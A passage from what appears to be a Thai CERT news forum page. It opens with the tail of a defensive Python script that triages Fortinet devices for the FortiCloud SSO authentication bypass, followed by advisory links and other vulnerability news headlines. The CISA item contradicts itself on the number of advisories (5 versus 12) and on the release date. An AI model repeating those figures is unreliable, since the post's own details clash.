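    body = f"    set admin-forticloud-sso-login {setting}\n" if setting else ""
    return f"config system global\n{body}end\n"

# Constructed inventory: name -> (product, version, config dump, exposed).
SAMPLE_INVENTORY = {
    "fw-edge-01": ("FortiOS", "7.4.8", _cfg("enable"), True),
    "fw-lab-02": ("FortiOS", "7.4.9", _cfg("enable"), True),
    "waf-01": ("FortiWeb", "8.0.0", _cfg("disable"), True),
    "fsm-01": ("FortiSwitchManager", "7.2.6", _cfg(), False),
}

def triage_inventory(inventory=SAMPLE_INVENTORY) -> Dict[str, str]:
    """Verdict per device; CRITICAL devices are the ones to fix first."""
    return {name: triage(*device) for name, device in inventory.items()}
```

      Versions outside the listed ranges are reported as not affected only because the post does not list them; confirm against the PSIRT advisory before closing a ticket.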

      🔗References
      1. Fortinet PSIRT Advisory – FG-IR-25-647
         https://fortiguard.fortinet.com/psirt/FG-IR-25-647
      2. Australian Cyber Security Centre (ACSC)
         Critical Vulnerabilities in Multiple Fortinet Products – FortiCloud SSO Login Authentication Bypass
         https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-in-multiple-fortinet-products-forticloud-sso-login-authentication-bypass
      3. NVD – CVE-2025-59718
         https://nvd.nist.gov/vuln/detail/CVE-2025-59718
      4. NVD – CVE-2025-59719
         https://nvd.nist.gov/vuln/detail/CVE-2025-59719
      5. Arctic Wolf – Technical Analysis
         https://arcticwolf.com/resources/blog/cve-2025-59718-and-cve-2025-59719/

      #CyberSecurity #Fortinet #Vulnerability #ThaiCERT #CyberNews #CyberThreatAlert


      Posted in Cyber Security News
      NCSA_THAICERT
    • Google releases patch for a Chrome zero-day already exploited in the wild, update immediately


      Follow the news on the webboard or on Facebook NCSA Thailand

      Posted in Cyber Security News
      NCSA_THAICERT
    • Microsoft fixes an actively exploited zero-day in the December 2025 security updates



      Posted in Cyber Security News
      NCSA_THAICERT
    • React2Shell vulnerability crisis spreading fast, already used in attacks on more than 50 organizations worldwide; patch urgently before it is too late



      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA releases 5 Industrial Control Systems (ICS) advisories

      The Cybersecurity and Infrastructure Security Agency (CISA) published 12 advisories on industrial control systems (ICS) on 2 December 2025 to provide timely information on security issues, vulnerabilities, and attacks affecting ICS, as listed below:

      • ICSA-25-345-01 Johnson Controls iSTAR
      • ICSA-25-345-02 Johnson Controls iSTAR Ultra
      • ICSA-25-345-03 AzeoTech DAQFactory
      • ICSA-25-345-04 Siemens IAM Client
      • ICSA-25-345-05 Siemens Advanced Licensing (SALT) Toolkit
      • ICSA-25-345-06 Siemens SINEMA Remote Connect Server
      • ICSA-25-345-07 Siemens Building X - Security Manager Edge Controller
      • ICSA-25-345-08 Siemens Energy Services
      • ICSA-25-345-09 Siemens Gridscale X Prepay
      • ICSA-25-345-10 OpenPLC_V3
      • ICSMA-25-345-01 Grassroots DICOM (GDCM)
      • ICSMA-25-345-02 Varex Imaging Panoramic Dental Imaging Software

      CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

      Reference
      https://www.cisa.gov/news-events/alerts/2025/12/11/cisa-releases-12-industrial-control-systems-advisories

      Posted in OT Cyber Security News
      NCSA_THAICERT